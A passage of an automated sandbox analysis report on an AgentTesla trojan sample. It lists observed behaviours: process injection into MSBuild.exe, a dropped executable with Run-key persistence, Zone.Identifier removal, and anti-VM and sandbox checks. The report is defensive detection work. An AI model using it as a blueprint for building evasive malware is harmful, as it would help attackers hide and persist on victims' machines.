                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F60F7 push es; ret 9_2_067F60F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F60EF push es; ret 9_2_067F60F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F60E7 push es; ret 9_2_067F60E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F60BF push es; ret 9_2_067F60C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F60B7 push es; ret 9_2_067F60B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F60AF push es; ret 9_2_067F60B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F60A7 push es; ret 9_2_067F60A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F609F push es; ret 9_2_067F60A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F610F push es; ret 9_2_067F6110
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeStatic PE information: 0xCED63224 [Mon Dec 18 16:53:56 2079 UTC]
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.97974117818
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ykVBUYJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ykVBUYJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: 00000000.00000002.319389781.000000000355E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe PID: 6260, type: MEMORYSTR
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.319389781.000000000355E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.319389781.000000000355E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe TID: 6264Thread sleep time: -45733s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe TID: 6280Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3216Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3380Thread sleep count: 6084 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3380Thread sleep count: 2290 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe TID: 3104Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe TID: 6304Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 6084Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 2290Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeThread delayed: delay time: 45733Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                    Source: MSBuild.exe, 00000009.00000002.527123484.00000000012EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllnito
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067FC640 LdrInitializeThunk,9_2_067FC640
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 436000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 464000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D86008Jump to behavior
                    .NET source code references suspicious native API functions
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/Shared/NativeMethodsShared.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('OpenProcess', 'OpenProcess@KERNEL32.DLL'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                    Source: 9.0.MSBuild.exe.400000.4.unpack, A/E1.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 9.0.MSBuild.exe.400000.1.unpack, A/E1.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 9.0.MSBuild.exe.400000.3.unpack, A/E1.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
